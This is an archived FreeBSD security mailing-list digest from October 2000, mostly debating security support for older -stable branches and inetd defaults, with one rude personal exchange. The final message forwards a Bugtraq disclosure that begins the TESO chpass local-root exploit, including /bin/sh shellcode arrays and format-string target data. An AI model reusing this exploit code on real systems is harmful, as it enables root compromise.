Oh, I dunno, I think you may still be operating from the old "economic assumptions" with these concerns. We have a lot more people than we used to, after all, and just the general buy-in to this thread so far would tend to indicate that interest level in legacy support is higher than it has been in recent memory. We just need more volunteers who are committed to r.v-stable (-solid? -stale?) and its upkeep, something which I'd expect to be somewhat easier to recruit part-time help for than -current since the pace of life is much more relaxed there, and you can get people to sign up without having to make a truly major full-time commitment to development. Nobody expects 50 commits a year on a -stale branch either, just 5 or 6 well-chosen ones, and even with part-time help, cvs can easily provide the requisite diffs to someone with a very specific point of focus (it's only when you try to look at all of src between branches that life starts sucking rocks).

I also might not have said this 6 months ago when things like OpenSSL and RSA were not integrated and enhancing security really often did involve major infrastructural overhauls before you could address even some very basic security issue. We've gotten both far more functional and more modular as of late there, however, and it would certainly be my hope that future security fixes will generally be the easiest to merge without requiring interface changes or tons of infrastructural support to pull off (a buffer overflow or missing consistency check being a fairly stand-alone change, neh?).
Or maybe I'm just smoking crack, but I honestly believe we have to at least try this. FreeBSD has really done some major growing up as an OS in the last 3 years alone and I think we simply have to make periodic shifts in our MO to compensate or we're dogmeat.

I'm also fine with your suggestion that we first try it for a few months to see how it truly goes before announcing the policy change to the world, but we should at least stop actively warning people away if we're going to try this at all seriously. We can be conservative and hold back on the horn-blowing without dire effect to this "experiment", but we can't have mixed messages going out without compromising it, either.

> Speaking for myself as part of the security team, I don't want to
> support 3.x for security fixes any more, since it's been just too damn

To me, this is only an argument that you need more help, not that the fundamental idea of supporting security fixes for 3.x is somehow unsound. :-) It seems like you essentially agree in your next two paragraphs anyway, so can we now see a show of hands for "deputies" who'd be willing to work on back-porting even just security enhancements to 3.x (and, eventually, 4.x)?
- Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19:12:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id BE89237B502; Tue, 3 Oct 2000 19:12:30 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e942COX85536; Tue, 3 Oct 2000 19:12:24 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Ade Lovett Cc: Alfred Perlstein , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Ade Lovett of "Tue, 03 Oct 2000 20:51:59 CDT." <20001003205159.A20891@FreeBSD.org> Date: Tue, 03 Oct 2000 19:12:24 -0700 Message-ID: <85532.970625544@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > What about ports? How do you propose that they be tested, as opposed > to "it-compiles-so-ship-it" on these 3.x boxes if, say, the developer > in question only runs 4.x boxes, with a single not-yet-built 5.x box > for when 5.x settles down? I think we need to go back to providing dynamically created "sandboxes" again, where the would-be tester can quickly create a minimal (e.g. nothing more than strictly required) chroot tree from scratch, chroot into it and build the port in question so that it and all its deps get properly built and tested. We used to do that back in the "old days" and then stopped, probably because people got worried about root access for chroot and killed sandboxes rather than simply firewalling the heck out of a sacrificial box and moving them there. 
Anyway, these sandboxes should furthermore live on a 3.x reference box which the project provides (so the developer's not on the hook for it) and is specially selected for having cojones muy grande in the disk and CPU department. I can arrange the hardware, I'm fairly confident of that part. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19:15:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 6F4CD37B66C; Tue, 3 Oct 2000 19:15:12 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e942F8X85592; Tue, 3 Oct 2000 19:15:09 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) Cc: Kris Kennaway , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: Message from Jordan Hubbard of "Tue, 03 Oct 2000 19:07:41 PDT." <85378.970625261@winston.osd.bsdi.com> Date: Tue, 03 Oct 2000 19:15:08 -0700 Message-ID: <85588.970625708@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just to follow up to that message - please ignore the punctuation and the flagrant, confusing misuse thereof. I clearly wrote, badly edited, then sent that message way too quickly. 
:) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 19:22:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D30C437B66E; Tue, 3 Oct 2000 19:21:59 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA18026; Tue, 3 Oct 2000 19:21:59 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Tue, 3 Oct 2000 19:21:58 -0700 From: Kris Kennaway To: Jordan Hubbard Cc: Kris Kennaway , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Message-ID: <20001003192158.A14805@freefall.freebsd.org> References: <85378.970625261@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <85378.970625261@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 07:07:41PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 07:07:41PM -0700, Jordan Hubbard wrote: > Or maybe I'm just smoking crack, but I honestly believe we have to at > least try this. 
FreeBSD has really done some major growing up as OS I was agreeing with the "try this and see if it works", just not the "and it will be better" implication by announcing that 3.x will be supported better, even before anyone's made the attempt and tried not to fail at it :-) > > Speaking for myself as part of the security team, I don't want to > > support 3.x for security fixes any more, since it's been just too damn > > To me, this is only an argument that you need more help, not that the > fundamental idea of supporting security fixes for 3.x is somehow > unsound. :-) It seems like you essentially agree in your next two > paragraphs anyway, so can we now see a show of hands for "deputies" > who'd be willing to work on back-porting even just security > enhancements to 3.x (and, eventually, 4.x)? The idea of supporting 2.x fixes isn't fundamentally unsound either, it's just that no-one cares enough to do the work. So if someone wants to take on the job of backporting 3.x fixes, we can keep doing it, otherwise if no-one is we'll stop (based on discussions amongst the security officer team I think it's fair to say none of us have the time/desire to do it) Kris -- In God we Trust -- all others must submit an X.509 certificate. 
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:20: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id B0FE637B66C; Tue, 3 Oct 2000 20:19:50 -0700 (PDT) Received: by puck.firepipe.net (Postfix, from userid 1000) id AA5C11953; Tue, 3 Oct 2000 22:20:04 -0500 (EST) Date: Tue, 3 Oct 2000 22:20:04 -0500 From: Will Andrews To: Paul Richards Cc: Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003222004.Z41798@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Paul Richards , Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org References: <83262.970607906@winston.osd.bsdi.com> <39DA6055.594B13E4@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39DA6055.594B13E4@originative.co.uk>; from paul@originative.co.uk on Tue, Oct 03, 2000 at 11:40:21PM +0100 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote: > I think you're looking at it the wrong way around. The stable team > wouldn't be putting in a lot of hours reviewing stable commits. Stable > commits would only occur if the stable team did them i.e. no-one else > would be allowed to commit to stable. 
The stable team would then monitor > -current, noting commits that are bug fixes, and slating them for a MFC > at a later date when it's felt they've had enough of a shakeout. Uhm, I doubt you can come up with a comprehensive team of people who can figure out the implications of X, Y, or Z to MFC. This is a large project, and everyone has different skills/knowledge about different things. Sorry, but no go on this. I still think every committer should have a couple other eyes lint their work. -- Will Andrews - Physics Computer Network wench The Universal Answer to All Problems - "It has something to do with physics." -- Comic on door of Room 240, Physics Building, Purdue University To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:38:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id D4E0A37B502; Tue, 3 Oct 2000 20:38:43 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e943cfM13104; Tue, 3 Oct 2000 21:38:42 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32448; Tue, 3 Oct 2000 21:38:39 -0600 (MDT) Message-Id: <200010040338.VAA32448@harmony.village.org> To: Jordan Hubbard Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Cc: developers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 19:07:41 PDT." 
<85378.970625261@winston.osd.bsdi.com> References: <85378.970625261@winston.osd.bsdi.com> Date: Tue, 03 Oct 2000 21:38:39 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <85378.970625261@winston.osd.bsdi.com> Jordan Hubbard writes: : > Speaking for myself as part of the security team, I don't want to : > support 3.x for security fixes any more, since it's been just too damn : : To me, this is only an argument that you need more help, not that the : fundamental idea of supporting security fixes for 3.x is somehow : unsound. :-) It seems like you essentially agree in your next two : paragraphs anyway, so can we now see a show of hands for "deputies" : who'd be willing to work on back-porting even just security : enhancements to 3.x (and, eventually, 4.x)? Historically, we've had a few people step up to the plate for this and then disappear. I'm doubtful that something like this will work in practice. We had the same debate at the end of life for the 2.x branch and no one offered to fill in the void. Having said that, I would support having someone in the loop as part of the SO team that would do nothing but 3.x support. We can certainly try things out, but my expectations are low. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:49:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 4E8F137B66E; Tue, 3 Oct 2000 20:49:38 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id VAA10020; Tue, 3 Oct 2000 21:49:03 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id VAA27923; Tue, 3 Oct 2000 21:49:02 -0600 (MDT) (envelope-from nate) Date: Tue, 3 Oct 2000 21:49:02 -0600 (MDT) Message-Id: <200010040349.VAA27923@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Kris Kennaway Cc: Jordan Hubbard , Paul Richards , Christopher Masto , Warner Losh , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] In-Reply-To: <20001003192158.A14805@freefall.freebsd.org> References: <85378.970625261@winston.osd.bsdi.com> <20001003192158.A14805@freefall.freebsd.org> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > The idea of supporting 2.x fixes isn't fundamentally unsound either, > it's just that no-one cares enough to do the work. For what it's worth, I've got a couple of backported kernel fixes on my box (including at least one security fix) that are there because I am stuck on 2.2 due to hardware issues, as well as the fact that it simply 'works'. However, I didn't bother making the fix available because I felt it might give people the wrong impression. 
Just because *I* am willing to support a really old release such as FreeBSD 2, I still feel the users should be 'encouraged' to use newer releases. By not making those fixes available (which were in fact rather trivial to do), those folks who aren't capable of fixing the bugs will be more likely to upgrade their systems to a newer 'more supported' release. I think supporting older releases *really* needs to be done by a commercial entity (or at least folks who have a commercial stake in seeing it done), since the majority of developers are in it for the development fun, and product support is all but fun. :( Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:55: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id CB42237B503; Tue, 3 Oct 2000 20:54:54 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e943sqM13177; Tue, 3 Oct 2000 21:54:52 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32643; Tue, 3 Oct 2000 21:54:51 -0600 (MDT) Message-Id: <200010040354.VAA32643@harmony.village.org> To: Alfred Perlstein Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Cc: Jordan Hubbard , Paul Richards , Christopher Masto , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org In-reply-to: Your message of "Tue, 03 Oct 2000 17:43:13 PDT." 
<20001003174313.U27736@fw.wintelcom.net> References: <20001003174313.U27736@fw.wintelcom.net> <84222.970618959@winston.osd.bsdi.com> Date: Tue, 03 Oct 2000 21:54:51 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001003174313.U27736@fw.wintelcom.net> Alfred Perlstein writes: : * Jordan Hubbard [001003 17:23] wrote: : > : > We could also look into providing an "update" command or something : > which would pull either sources or binaries over from a snapshot box : > and make the process of getting up to the branch-head a lot easier. : > It's long been on my wishlist and I'm at the point where I'd be : > willing to devote some BSDi resources to both writing the software : > and setting up a build box for creating the relevant binaries on an : > ongoing basis. : : You ought to go to the cube next to you, Mike Smith said he had something : along the lines of that, er, something that would generate a binary : delta that could be spammed over an existing install. I've worked at companies that used cvsup to do this. I also setup an experimental cvsup box at one point to do this and it was fairly slick to watch. Ran into lots of problems from time to time with certain binary changes, but that was nothing a reboot on the new machine wouldn't fix. Oh, I think there was also an issue with replacing init, but I may have been misremembering. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 20:56: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A840137B503; Tue, 3 Oct 2000 20:55:58 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e943tvM13196; Tue, 3 Oct 2000 21:55:57 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32673; Tue, 3 Oct 2000 21:55:56 -0600 (MDT) Message-Id: <200010040355.VAA32673@harmony.village.org> To: Michael Bryan Subject: Re: How long for -stable [ Re: cvs commit: src/usr.bin/finger finger.c ] Cc: freebsd-security@FreeBSD.org, developers@FreeBSD.org In-reply-to: Your message of "Tue, 03 Oct 2000 18:03:37 PDT." <39DA81E9.FD461622@ursine.com> References: <39DA81E9.FD461622@ursine.com> <84222.970618959@winston.osd.bsdi.com> <20001003173414.A58372@freefall.freebsd.org> Date: Tue, 03 Oct 2000 21:55:56 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39DA81E9.FD461622@ursine.com> Michael Bryan writes: : Well, it's been said before, but I'll add my two cents to this. Support : for at least security-related issues really needs to be provided for a : reasonable duration, probably about a year, maybe longer, after a release : comes out. No one is disagreeing that this isn't wanted by users. The hard part is finding bodies to do the work. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 21:13: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 6214237B502 for ; Tue, 3 Oct 2000 21:13:02 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gg5U-00006q-00; Tue, 03 Oct 2000 22:23:24 -0600 Message-ID: <39DAB0BC.BE78E4DA@softweyr.com> Date: Tue, 03 Oct 2000 22:23:24 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: politeness References: <4.3.2.7.2.20001003103503.04c68240@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 03:53 AM 10/3/2000, Wes Peters wrote: > > >> Everyone has a right to write to the list and share his thoughts. > > > >No, the list has a charter. This is a republic, not a democracy. > > Does that mean that to get something posted to the list, I need to > contact my representative... No, it means the list has a purpose and off-topic rants don't belong here. This thread long since crossed that line, you know this just as well as I do, and yet you continue the rant publicly. I'll not be among those voting to twist your squelch knob, because I've just stuck you back in my personal black-hole filter. You're an ass of the first order and I will not waste my time conversing with you for some time to come. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 21:24:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 08BFD37B66C for ; Tue, 3 Oct 2000 21:24:19 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA26677; Tue, 3 Oct 2000 22:24:11 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003222242.00e3d720@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 22:24:08 -0600 To: Wes Peters From: Brett Glass Subject: Re: politeness Cc: security@FreeBSD.ORG In-Reply-To: <39DAB0BC.BE78E4DA@softweyr.com> References: <4.3.2.7.2.20001003103503.04c68240@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:23 PM 10/3/2000, Wes Peters wrote: >You're an ass of the first order and I will >not waste my time conversing with you for some time to come. So much for politeness! Thread abandoned. --Brett "I don't think you can put that cat back in the bottle." 
-- Kevin Surace, PERFECT.COM To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 21:56: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 0886C37B503 for ; Tue, 3 Oct 2000 21:56:02 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 3 Oct 2000 21:54:46 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e944twB75626; Tue, 3 Oct 2000 21:55:58 -0700 (PDT) (envelope-from cjc) Date: Tue, 3 Oct 2000 21:55:58 -0700 From: "Crist J . Clark" To: Garrett Wollman Cc: David Pick , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001003215558.W25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200010031705.LAA23799@nomad.yogotech.com> <200010031722.NAA41823@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200010031722.NAA41823@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Tue, Oct 03, 2000 at 01:22:27PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 01:22:27PM -0400, Garrett Wollman wrote: > < said: > > > gets no response (after a time-out) it would be entitled to retry a > > few times in case of packet loss. *But* if it gets a RST, which is a > > If net.inet.tcp.blackhole is set, an RST will not be emitted. OK, we're drifting from the point here. Someone suggested that auth be turned on by default in inetd.conf. One of the reasons given was to prevent sendmail delays. It was then /correctly/ pointed out that when sendmail receives a RST[0], an indication that there is no auth listener, the mail transfer will occur without delay. 
net.inet.tcp.blackhole is not turned on by default. Someone who knows enough to fiddle with that setting can be expected to be able to turn auth on or off in inetd.conf depending on how they want things to run. So, since in the _default_ setup, there actually is no delay to sendmail if auth is not activated, there is no argument to have it turned on in the default. Someone mentioned firewalls dropping the auth connection causing delays. It is a moot point. If the firewall drops the incoming auth, it makes no difference if the mail server has auth running or not since the connection never reaches it. [0] Yes, technically this is really happening at the transport layer within TCP. sendmail does not know anything about SYNs, ACKs, RSTs, and timeouts. sendmail tries to connect to the auth on the remote machine. The TCP connection fails slowly if it makes several retries and times out. The TCP connection fails quickly if it gets a RST. Either way, this is not directly related to sendmail, but the TCP/IP stack. -- Crist J. 
Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22: 0: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 9BEB937B502 for ; Tue, 3 Oct 2000 21:59:56 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e944xsM13541; Tue, 3 Oct 2000 22:59:54 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id WAA33311; Tue, 3 Oct 2000 22:59:54 -0600 (MDT) Message-Id: <200010040459.WAA33311@harmony.village.org> To: Wes Peters Subject: Re: Security and FreeBSD, my overall perspective Cc: Jordan Hubbard , security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 01:41:12 MDT." <39D98D98.B0627C08@softweyr.com> References: <39D98D98.B0627C08@softweyr.com> <2376.970339459@winston.osd.bsdi.com> <200009302258.QAA13969@harmony.village.org> Date: Tue, 03 Oct 2000 22:59:54 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39D98D98.B0627C08@softweyr.com> Wes Peters writes: : N == 3 { 'green', 'yellow', 'red' }. If you're feeling like a telco, throw : 'blue' in there somewhere, though nobody really seems to understand what : 'blue' really means. Green, blue, black. 
Works great for ski runs :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22: 8:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7446A37B502 for ; Tue, 3 Oct 2000 22:08:39 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e9458bM13585; Tue, 3 Oct 2000 23:08:38 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id XAA33386; Tue, 3 Oct 2000 23:08:37 -0600 (MDT) Message-Id: <200010040508.XAA33386@harmony.village.org> To: Brett Glass Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 17:55:55 MDT." <4.3.2.7.2.20001003175130.043dc4c0@localhost> References: <4.3.2.7.2.20001003175130.043dc4c0@localhost> <200010032326.e93NQ7H17213@netplex.com.au> <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> Date: Tue, 03 Oct 2000 23:08:37 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001003175130.043dc4c0@localhost> Brett Glass writes: : At 05:42 PM 10/3/2000, Alfred Perlstein wrote: : : >There's a large difference between kernel and userland here, kernel : >changes need to be backported relatively quickly while userland : >can allow for a longer test period. Seperate policies may serve : >us better than one that covers the entire tree. : : What about root compromises in userland -- e.g. in setuid apps, daemons : that run (or at least start) as root, etc.? Root compromises invoke the compelling reason clause, as do most security fixes. 
Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:13: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1C1BC37B503 for ; Tue, 3 Oct 2000 22:13:03 -0700 (PDT) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.0/8.9.3) with ESMTP id e945Dit19165 for ; Wed, 4 Oct 2000 01:13:44 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20001004011210.035225e0@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Wed, 04 Oct 2000 01:12:59 -0400 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: Fwd: BSD chpass Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OK, here is a nasty bugtraq posting :-( ---Mike >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@lists.securityfocus.com >Delivered-To: bugtraq@securityfocus.com >User-Agent: Mutt/1.2i >Date: Wed, 4 Oct 2000 02:45:48 +1000 >Reply-To: caddis >Sender: Bugtraq List >From: caddis >Subject: BSD chpass >To: BUGTRAQ@SECURITYFOCUS.COM
>
>/*
> * TESO BSD chpass exploit - caddis
> *
> * greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613
> *
> */
>#include <stdio.h>
>#include <stdlib.h>
>#include <string.h>
>#include <unistd.h>
>
>char bsd_shellcode[] =
>"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89"
>"\x4e\x08\x89\x46\x0c\x8d\x4e\x08"
>"\x50\x51\x56\x50\xb0\x3b\xcd\x80"
>"\xe8\xe5\xff\xff\xff/bin/sh";
>
>char ptmp_shellcode[] =
>"\xeb\x26\x5e\x31\xdb\x88\x5e\x07"
>"\x89\x76\x12\x89\x5e\x16\x8d\x4e"
>"\x12\x8d\x56\x08\x31\xc0\x52\x53"
>"\xb0\x0a\xcd\x80\x53\x51\x56\x53"
>"\xb0\x3b\xcd\x80\xb0\x01\xcd\x80"
>"\xe8\xd5\xff\xff\xff/bin/sh!/etc/ptmp";
>
>struct platform {
>    char *name;
>    unsigned short count;      /* %8x pops needed to reach the words planted in jmpcode */
>    unsigned long dest_addr;   /* address the two %hn writes overwrite */
>    unsigned long shell_addr;  /* address of the NOP sled / shellcode */
>    char *shellcode;
>};
>
>struct platform targets[9] =
>{
